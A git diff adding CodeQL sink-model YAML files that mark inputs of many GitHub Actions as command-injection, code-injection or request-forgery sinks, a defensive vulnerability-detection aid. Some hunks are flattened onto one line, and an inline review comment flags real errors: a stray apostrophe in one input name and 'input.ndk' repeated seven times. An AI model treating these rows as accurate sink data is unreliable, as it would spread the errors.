+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"]
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
new file mode 100644
index 00000000000..86705319e23
--- /dev/null
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"]
+ - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml new file mode 100644 index 00000000000..61fdcd9254a --- /dev/null +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index ab413b6e975..2d142d98099 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml new file mode 100644 index 00000000000..1727ca60e25 --- /dev/null +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml new file mode 100644 index 00000000000..146f4a17a55 --- /dev/null +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-semantic-release/action", "*", "input.bin", "command-injection"] 
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml
new file mode 100644
index 00000000000..8c0f7a5ad61
--- /dev/null
+++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
new file mode 100644
index 00000000000..9c7c03b9f35
--- /dev/null
+++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"]
+ - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"]
diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
new file mode 100644
index 00000000000..9d9eac38af0
--- /dev/null
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
new file mode 100644
index 00000000000..4c74301d1c3
--- /dev/null
+++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
new file mode 100644
index 00000000000..6332cbfdad8
--- /dev/null
+++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml
new file mode 100644
index 00000000000..f8b8490c213
--- /dev/null
+++ b/ql/lib/ext/ilammy_setup-nasm.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ilammy/setup-nasm", "*", "input.version", "command-injection"]
+ - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"]
diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml
new file mode 100644
index 00000000000..64024ef5c72
--- /dev/null
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml
new file mode 100644
index 00000000000..1771ac2bad0
--- /dev/null
+++ b/ql/lib/ext/iterative_setup-cml.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["iterative/setup-cml", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml
new file mode 100644
index 00000000000..e8600c6f7df
--- /dev/null
+++ b/ql/lib/ext/iterative_setup-dvc.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["iterative/setup-dvc", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
new file mode 100644
index 00000000000..2ab70905db1
--- /dev/null
+++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"]
diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
new file mode 100644
index 00000000000..948be24b45c
--- /dev/null
+++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml
new file mode 100644
index 00000000000..928c1f918d3
--- /dev/null
+++ b/ql/lib/ext/jurplel_install-qt-action.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["jurplel/install-qt-action", "*", "input.version", "command-injection"]
+ - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"]
+ - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"]
+ - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"]
+ - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"]
+ - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"]
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b237ac313d2..ad95f1f323a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -4,3 +4,10 @@ extensions: extensible: summaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml new file mode 100644 index 00000000000..b3cb5aa3940 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 00000000000..a84880cfdf1 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml new file mode 100644 index 00000000000..f32484a4f0d --- /dev/null +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml
new file mode 100644
index 00000000000..9ce43e68a75
--- /dev/null
+++ b/ql/lib/ext/magefile_mage-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["magefile/mage-action", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml
new file mode 100644
index 00000000000..ac3aaa67def
--- /dev/null
+++ b/ql/lib/ext/maierj_fastlane-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["maierj/fastlane-action", "*", "input.lane", "command-injection"]
+ - ["maierj/fastlane-action", "*", "input.options", "command-injection"]
+ - ["maierj/fastlane-action", "*", "input.env", "command-injection"]
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
new file mode 100644
index 00000000000..90fd673c705
--- /dev/null
+++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"]
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 91741f58706..2c9f46b46f4 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -5,3 +5,12 @@ extensions: data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml new file mode 100644 index 00000000000..1bcf8e7ce7a --- /dev/null +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml new file mode 100644 index 00000000000..81706744568 --- /dev/null +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] 
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
new file mode 100644
index 00000000000..aeca6db0d98
--- /dev/null
+++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
@@ -0,0 +1,16 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml
new file mode 100644
index 00000000000..b9358bd2d69
--- /dev/null
+++ b/ql/lib/ext/msys2_setup-msys2.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["msys2/setup-msys2", "*", "input.install", "command-injection"]
+ - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml
new file mode 100644
index 00000000000..a18319954e3
--- /dev/null
+++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"]
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"]
diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
index 3db3e9cf66c..f46c40a8f9c 100644
--- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
@@ -4,3 +4,9 @@ extensions:
 extensible: summaryModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"]
+ - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
new file mode 100644
index 00000000000..219de80c39e
--- /dev/null
+++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"]
diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml
new file mode 100644
index 00000000000..dc3c2739e87
--- /dev/null
+++ b/ql/lib/ext/nanasess_setup-php.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["nanasess/setup-php", "*", "input.php-version", "command-injection"]
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml
new file mode 100644
index 00000000000..30679750f13
--- /dev/null
+++ b/ql/lib/ext/nick-fields_retry.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"]
+ - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"]
+ - ["nick-fields/retry", "*", "input.command", "command-injection"]
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml
new file mode 100644
index 00000000000..c600e7a93b6
--- /dev/null
+++ b/ql/lib/ext/octokit_graphql-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["octokit/graphql-action", "*", "input.query", "request-forgery"]
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml
new file mode 100644
index 00000000000..ed9088c9f56
--- /dev/null
+++ b/ql/lib/ext/octokit_request-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["octokit/request-action", "*", "input.route", "request-forgery"]
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml
new file mode 100644
index 00000000000..988c3d5e674
--- /dev/null
+++ b/ql/lib/ext/olafurpg_setup-scala.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"]
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml
new file mode 100644
index 00000000000..91a3382348c
--- /dev/null
+++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"]
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml
new file mode 100644
index 00000000000..d9d15dc94b2
--- /dev/null
+++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"]
diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
new file mode 100644
index 00000000000..6bc0467692d
--- /dev/null
+++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"]
+ - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"]
+ - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"]
diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml
new file mode 100644
index 00000000000..62dea47d818
--- /dev/null
+++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"]
+ - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"]
diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml
new file mode 100644
index 00000000000..525d0199859
--- /dev/null
+++ b/ql/lib/ext/py-actions_flake8.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"]
+ - ["py-actions/flake8", "*", "input.plugins", "command-injection"]
+ - ["py-actions/flake8", "*", "input.path", "command-injection"]
+ - ["py-actions/flake8", "*", "input.ignore", "command-injection"]
+ - ["py-actions/flake8", "*", "input.exclude", "command-injection"]
+ - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"]
+ - ["py-actions/flake8", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml
new file mode 100644
index 00000000000..5aac0f89432
--- /dev/null
+++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"]
diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml
new file mode 100644
index 00000000000..d32c6509ad7
--- /dev/null
+++ b/ql/lib/ext/pyo3_maturin-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"]
+ - ["pyo3/maturin-action", "*", "input.target", "command-injection"]
+ - ["pyo3/maturin-action", "*", "input.command", "command-injection"]
+ - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"]
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
new file mode 100644
index 00000000000..c4ea326ecef
--- /dev/null
+++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
@@ -0,0 +1,24 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml
new file mode 100644
index 00000000000..7213a39f992
--- /dev/null
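Review bot: Two rows in this hunk will not behave as intended: `"input.sdcard-path-or-size'"` carries a stray trailing apostrophe, so it presumably never matches the action's real input name, and the `input.ndk` row appears seven times, which looks like a copy-paste placeholder for inputs that were meant to be listed. Drop the apostrophe (`"input.sdcard-path-or-size"`) and replace the repeated rows with the intended inputs or delete them. The same apostrophe slip is in tripss_conventional-changelog-action.model.yml (`"input.tag-prefix'"`), and veracode_veracode-sca.model.yml lists `input.url` twice.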
+++ b/ql/lib/ext/reggionick_s3-deploy.model.yml
@@ -0,0 +1,13 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"]
diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml
new file mode 100644
index 00000000000..3207c6d7521
--- /dev/null
+++ b/ql/lib/ext/renovatebot_github-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"]
diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml
new file mode 100644
index 00000000000..d00d78bcba8
--- /dev/null
+++ b/ql/lib/ext/roots_issue-closer-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"]
+ - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"]
diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml
new file mode 100644
